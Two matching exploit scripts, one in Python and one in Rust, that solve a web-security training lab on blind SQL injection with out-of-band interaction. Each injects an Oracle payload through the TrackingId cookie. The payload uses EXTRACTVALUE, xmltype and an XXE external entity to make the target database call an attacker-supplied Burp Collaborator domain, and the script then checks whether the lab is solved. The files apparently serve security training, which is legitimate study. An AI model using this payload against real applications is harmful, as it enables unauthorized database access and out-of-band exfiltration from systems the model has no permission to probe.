File: with-python/sql-injection/13-blind-sql-injection-with-out-of-band-interaction.py
from time import sleep
from lib import (
    SESSION,
    check_is_lab_solved,
    generate_parser,
    get_tracking_id,
)
from urllib.parse import quote

if __name__ == "__main__":
    args = generate_parser()

    lab_url = args.lab_url.strip("/")
    collaborator_domain = args.collaborator_domain

    if not collaborator_domain:
        print("[-] Burp Collaborator Domain Required for solving this exercise")
        exit()

    tracking_id = get_tracking_id(lab_url)

    payload = quote(
        f"""' || (SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://{collaborator_domain}/"> %remote;]>'),'/l') FROM dual) --"""
    )

    response = SESSION.get(lab_url, cookies={"TrackingId": f"{tracking_id}{payload}"})

    if response.status_code == 200:
        print(
            "[+] Made the request successfully. Check Burp Collaborator for the results"
        )
        print("[+] Waiting for 5 seconds before checking whether the lab is solved")
        sleep(5)
    else:
        print("[-] Failed to make the request")
        exit()

    check_is_lab_solved(lab_url)

File: with-rust/sql-injection/src/bin/13-blind-sql-injection-with-out-of-band-interaction.rs
use reqwest::header::COOKIE;
use sql_injection::{HTTP_CLIENT, check_is_lab_solved, generate_clap_parser, get_tracking_id};
use std::{thread::sleep, time::Duration};
use urlencoding::encode;

fn main() {
    let args = generate_clap_parser();

    let lab_url = args.lab_url.as_str().trim_end_matches("/");
    let collaborator_domain = args
        .collaborator_domain
        .expect("[-] Burp Collaborator Domain is required for solving this lab");

    let tracking_id = get_tracking_id(lab_url);

    let payload = format!(
        r#"' || (SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://{}/"> %remote;]>'),'/l') FROM dual) --"#,
        collaborator_domain
    );

    let response = HTTP_CLIENT
        .get(lab_url)
        .header(
            COOKIE,
            format!("TrackingId={}{}", tracking_id, encode(payload.as_ref())),
        )
        .send()
        .expect("[-] Failed to make the request");

    if response.status() == 200 {
        logger::success("Made the request successfully. Check Burp Collaborator for the results");
        logger::success("Waiting for 5 seconds before checking whether the lab is solved");

        sleep(Duration::from_secs(5));
    } else {
        panic!("{}", logger::error_return("Failed to make the request"))
    }

    check_is_lab_solved(lab_url);
}
